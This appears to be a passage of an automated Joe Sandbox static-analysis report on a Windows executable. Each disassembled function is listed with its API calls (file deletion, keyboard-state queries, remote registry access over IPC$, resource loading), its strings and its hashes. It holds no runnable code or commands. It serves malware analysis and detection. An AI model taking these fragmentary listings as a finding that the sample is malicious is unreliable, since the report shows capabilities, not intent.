Opcode ID: a651c53deffff426a8c065c9039896435eea4926b0c27d40f71b0f558a7cccc7
Instruction ID: 4e38278c59af08a295ba520248a9be2215d9cdcec6d35c85baf2a831dbc5bbf4
Opcode Fuzzy Hash: a651c53deffff426a8c065c9039896435eea4926b0c27d40f71b0f558a7cccc7
Instruction Fuzzy Hash: 7C516D72904209BACF15EBA0DD42EEEB779EF14700F104566F105B21A1EA71AF58DBB1

Function 00DDD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00DDD37F

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DDD3A0
__swprintf.LIBCMT ref: 00DDD3F3
_wprintf.LIBCMT ref: 00DDD499
_wprintf.LIBCMT ref: 00DDD4B7

Strings

Error: , xrefs: 00DDD463
"%s" (%d) : ==> %s:, xrefs: 00DDD4B2
"%s" (%d) : ==> %s:%s%s, xrefs: 00DDD494
^ ERROR , xrefs: 00DDD432
Line %d (File "%s"):, xrefs: 00DDD3ED

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-3420473620
Opcode ID: b0ab77424aed9ae6156efe30da67a3933f1aaa408faf3a06133b73fbc469590f
Instruction ID: 12aa3380ca77f65aeee33a2bcb66f052449a552aa177507fe0a4b57730cbd418
Opcode Fuzzy Hash: b0ab77424aed9ae6156efe30da67a3933f1aaa408faf3a06133b73fbc469590f
Instruction Fuzzy Hash: 98519C72900209BACF15EBE0ED82EEEB779EF14700F108566F105B21A1EA756F58DB71

Function 00DCAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

_memset.LIBCMT ref: 00DCAF74
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DCAFA9
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DCAFC5
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DCAFE1
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DCB00B
CLSIDFromString.COMBASE(?,?), ref: 00DCB033
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DCB03E
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DCB043

Strings

\IPC$, xrefs: 00DCAF8B
\CLSID, xrefs: 00DCAF2B
SOFTWARE\Classes\, xrefs: 00DCAF15

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: b2df82e92e0240b53ce3523649f670cb193c4e44c6045103f6b7eddd47953c23
Instruction ID: 869e41fd28d20fa2cd460350c749d1ba714cd855d2745bc812025e197e50c1e3
Opcode Fuzzy Hash: b2df82e92e0240b53ce3523649f670cb193c4e44c6045103f6b7eddd47953c23
Instruction Fuzzy Hash: 6441E37681022DAACF11EBA4EC85DEEB779EF18714F44416AF911B3160EB719E04CFA0

Function 00DD7212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00DD7226
__swprintf.LIBCMT ref: 00DD7233

Part of subcall function 00DB234B: __woutput_l.LIBCMT ref: 00DB23A4

FindResourceW.KERNEL32(?,?,0000000E), ref: 00DD725D
LoadResource.KERNEL32(?,00000000), ref: 00DD7269
LockResource.KERNEL32(00000000), ref: 00DD7276
FindResourceW.KERNEL32(?,?,00000003), ref: 00DD7296
LoadResource.KERNEL32(?,00000000), ref: 00DD72A8
SizeofResource.KERNEL32(?,00000000), ref: 00DD72B7
LockResource.KERNEL32(?), ref: 00DD72C3
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00DD7322

Strings

L6, xrefs: 00DD721F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: L6
API String ID: 1433390588-4199682035
Opcode ID: fe6b3287a2941a286fe10bf228656f8cf24834886b7fa15f746870c02459c6cf
Instruction ID: 0294090bbe4e2773daf05b5b8f279f7381a609a8e2e0966a4a56d3900965760b
Opcode Fuzzy Hash: fe6b3287a2941a286fe10bf228656f8cf24834886b7fa15f746870c02459c6cf
Instruction Fuzzy Hash: 8D318E7190825AAFDB019F62DC45AEF7BA9FF04341B048456FD22E2260E734D954DAB4

Function 00DD83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DD843F
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DD8455
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD8466
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DD8478
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DD8489

Strings

alias PlayMe, xrefs: 00DD8418
play PlayMe, xrefs: 00DD8484
open , xrefs: 00DD83EE
play PlayMe wait, xrefs: 00DD8473
close PlayMe, xrefs: 00DD8450, 00DD847D
status PlayMe mode, xrefs: 00DD843A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 9ccb58e1ee947a875d02e7c112f4ce6c900422329aec8e8ff1e05ffdc83d5950
Instruction ID: 9880468962524f9f7915452e998150f3481ec396b6ed64729f74734f1ccc3d55
Opcode Fuzzy Hash: 9ccb58e1ee947a875d02e7c112f4ce6c900422329aec8e8ff1e05ffdc83d5950
Instruction Fuzzy Hash: 6C11A761A5025D79DB25A7B1EC4ADFFBB7CEBD5B00F44042AB411B21D1DEA05E44C6B0

Function 00DD8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00DD809C

Part of subcall function 00DAE3A5: timeGetTime.WINMM(?,76C1B400,00E06163), ref: 00DAE3A9

Sleep.KERNEL32(0000000A), ref: 00DD80C8
EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00DD80EC
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00DD810E
SetActiveWindow.USER32 ref: 00DD812D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DD813B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00DD815A
Sleep.KERNEL32(000000FA), ref: 00DD8165
IsWindow.USER32 ref: 00DD8171
EndDialog.USER32(00000000), ref: 00DD8182

Strings

BUTTON, xrefs: 00DD8100

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f20ec1d878e62eaf308cd7ed0d53c4bf81beadc21bfac37d301ead4c8665fcce
Instruction ID: 42610f57ef81f8ad89efb873c3ac410332d036a939b8197073a75cd68069dd24
Opcode Fuzzy Hash: f20ec1d878e62eaf308cd7ed0d53c4bf81beadc21bfac37d301ead4c8665fcce
Instruction Fuzzy Hash: EA216FB0244305BFE7275F73EC89A763B6AF71438AB084516F521A2361CF728D0DAA71

Function 00DDC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDC6A0: __time64.LIBCMT ref: 00DDC6AA

Part of subcall function 00D941A7: _fseek.LIBCMT ref: 00D941BF

__wsplitpath.LIBCMT ref: 00DDC96F

Part of subcall function 00DB297D: __wsplitpath_helper.LIBCMT ref: 00DB29BD

_wcscpy.LIBCMT ref: 00DDC982
_wcscat.LIBCMT ref: 00DDC995
__wsplitpath.LIBCMT ref: 00DDC9BA
_wcscat.LIBCMT ref: 00DDC9D0
_wcscat.LIBCMT ref: 00DDC9E3

Part of subcall function 00DDC6E4: _memmove.LIBCMT ref: 00DDC71D
Part of subcall function 00DDC6E4: _memmove.LIBCMT ref: 00DDC72C

_wcscmp.LIBCMT ref: 00DDC92A

Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF49
Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF5C

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DDCB8D
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DDCC24
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DDCC3A
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DDCC4B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DDCC5D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 152968663-0
Opcode ID: f07f84258b14601a7e472052c4828ad8d1583a2852b476049510d3b1395734f2
Instruction ID: f6cc37ec50f344013ad0193086f928e30a9f199a86f116ab150fe68ce22bbe78
Opcode Fuzzy Hash: f07f84258b14601a7e472052c4828ad8d1583a2852b476049510d3b1395734f2
Instruction Fuzzy Hash: F5C11CB1910229AEDF10DFA5CC81EEEB7BDEF59310F0040AAB609E6251D7709A85CF75

Function 00DE08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DE090D
_memset.LIBCMT ref: 00DE0928
CoInitialize.OLE32(00000000), ref: 00DE093B
SHGetMalloc.SHELL32(?), ref: 00DE0945
CoUninitialize.COMBASE ref: 00DE094F
_wcscpy.LIBCMT ref: 00DE0993
SHGetDesktopFolder.SHELL32(?), ref: 00DE09F5
_wcscpy.LIBCMT ref: 00DE0A1B
_wcscpy.LIBCMT ref: 00DE0A77
SHBrowseForFolderW.SHELL32 ref: 00DE0AA2
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DE0AC5
CoUninitialize.COMBASE ref: 00DE0B11

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
String ID:
API String ID: 3566271842-0
Opcode ID: c87e7d39e06004a137350b97f7a2912a5a6c4d5a2f0848e8cb4aff4c15f8ae1d
Instruction ID: 2776e095290fe34b5c4cfdb00f8c857afd55e9f93d023709651a1d906f30ffc4
Opcode Fuzzy Hash: c87e7d39e06004a137350b97f7a2912a5a6c4d5a2f0848e8cb4aff4c15f8ae1d
Instruction Fuzzy Hash: 09712F75900219EFDB14EFA5C884ADEBBB9FF48310F048096E919AB251D770EE40CFA0

Function 00DD388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00DD3908
SetKeyboardState.USER32(?), ref: 00DD3973
GetAsyncKeyState.USER32(000000A0), ref: 00DD3993
GetKeyState.USER32(000000A0), ref: 00DD39AA
GetAsyncKeyState.USER32(000000A1), ref: 00DD39D9
GetKeyState.USER32(000000A1), ref: 00DD39EA
GetAsyncKeyState.USER32(00000011), ref: 00DD3A16
GetKeyState.USER32(00000011), ref: 00DD3A24
GetAsyncKeyState.USER32(00000012), ref: 00DD3A4D
GetKeyState.USER32(00000012), ref: 00DD3A5B
GetAsyncKeyState.USER32(0000005B), ref: 00DD3A84
GetKeyState.USER32(0000005B), ref: 00DD3A92

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 44a49bfc8b1e53c4730d31acf353e659cf227056516cc89beb5e5469ecfd161d
Instruction ID: 9d656d4fd52eda1a4026b7bbcc489b44d67df240f1f3eec8a014f524d3e11f83
Opcode Fuzzy Hash: 44a49bfc8b1e53c4730d31acf353e659cf227056516cc89beb5e5469ecfd161d
Instruction Fuzzy Hash: 7E518821A0478469FB35EBA488117EABFB49F01740F0C859FD5C2563C2DAA49B8CD777

Function 00DCFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00DCFB19
GetWindowRect.USER32(00000000,?), ref: 00DCFB2B
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00DCFB89
GetDlgItem.USER32(?,00000002), ref: 00DCFB94
GetWindowRect.USER32(00000000,?), ref: 00DCFBA6
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00DCFBFC
GetDlgItem.USER32(?,000003E9), ref: 00DCFC0A
GetWindowRect.USER32(00000000,?), ref: 00DCFC1B
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00DCFC5E
GetDlgItem.USER32(?,000003EA), ref: 00DCFC6C
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DCFC89
InvalidateRect.USER32(?,00000000,00000001), ref: 00DCFC96

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: bf9a734a43b82119ca826c0171d928476421c2b6502bd3ebe17ad948a4d29bcc
Instruction ID: c1c360d4142efb242fe8b9679e4b110cb211da1d32c574e515cd9f94c6973dbc
Opcode Fuzzy Hash: bf9a734a43b82119ca826c0171d928476421c2b6502bd3ebe17ad948a4d29bcc
Instruction Fuzzy Hash: 8251FF71B00209AFDB18CF69DD95FAEBBBAEB88710F14852DB916E7290D7709D048B10

Function 00DAB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166

GetSysColor.USER32(0000000F), ref: 00DAB067

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 8d431f572795119e9df40af0ad8419879f0e90fa0450462fdef2680d648619c2
Instruction ID: 3bdc8e3f7e31ca0b6b3af1b1b5ddf22e9f6560b4bcca6820076d60e996df8c2d
Opcode Fuzzy Hash: 8d431f572795119e9df40af0ad8419879f0e90fa0450462fdef2680d648619c2
Instruction Fuzzy Hash: 3E419031105540AFDB245F38DC48BBA3B66EB07731F184266FDA59A2E2D7318C46DB35

Function 00DD7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00DD734C
_wcscpy.LIBCMT ref: 00DD735D
__wsplitpath.LIBCMT ref: 00DD7384
__wsplitpath.LIBCMT ref: 00DD73A8
_wcscpy.LIBCMT ref: 00DD73CA
_wcscpy.LIBCMT ref: 00DD73E8
_wcscpy.LIBCMT ref: 00DD73F9
_wcscat.LIBCMT ref: 00DD7408
_wcscat.LIBCMT ref: 00DD745D
_wcscat.LIBCMT ref: 00DD7493
_wcscat.LIBCMT ref: 00DD74A5

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 2c59379ba75a40b2b113dd501efad70b5c129fef3bd2566ba3a7c03ea9f621da
Instruction ID: 5f16ebf2efcc01352a976d767d89aa842ed8dc83ba1f8696e52b95c913e9cef1
Opcode Fuzzy Hash: 2c59379ba75a40b2b113dd501efad70b5c129fef3bd2566ba3a7c03ea9f621da
Instruction Fuzzy Hash: 4841D8B690426CAADF21EB50CC55EDE73BCEB08710F5041E6F519A2151EA71ABD48FB0

Function 00D984A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00D984E5
__itow.LIBCMT ref: 00D98519

Part of subcall function 00DB2177: _xtow@16.LIBCMT ref: 00DB2198

Strings

False, xrefs: 00E05568
0x%p, xrefs: 00E05582
True, xrefs: 00E05561
%.15g, xrefs: 00D984DF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 750974ee2fa5a7c59c2c5d45f543e02b9aaed09631d0f2f460e435391117fdbe
Instruction ID: 0997b42419728a7980401bf8eded4177b9846b23ec4efbf46da26df776a5991f
Opcode Fuzzy Hash: 750974ee2fa5a7c59c2c5d45f543e02b9aaed09631d0f2f460e435391117fdbe
Instruction Fuzzy Hash: 4441C172600705DBDF24DB38DC41AAA77E9EF45710F20446EE58AE7292EA31DA81DB30

Function 00DB5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DB5CCA

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

__gmtime64_s.LIBCMT ref: 00DB5D63
__gmtime64_s.LIBCMT ref: 00DB5D99
__gmtime64_s.LIBCMT ref: 00DB5DB6
__allrem.LIBCMT ref: 00DB5E0C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5E28
__allrem.LIBCMT ref: 00DB5E3F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5E5D
__allrem.LIBCMT ref: 00DB5E74
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5E92
__invoke_watson.LIBCMT ref: 00DB5F03

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
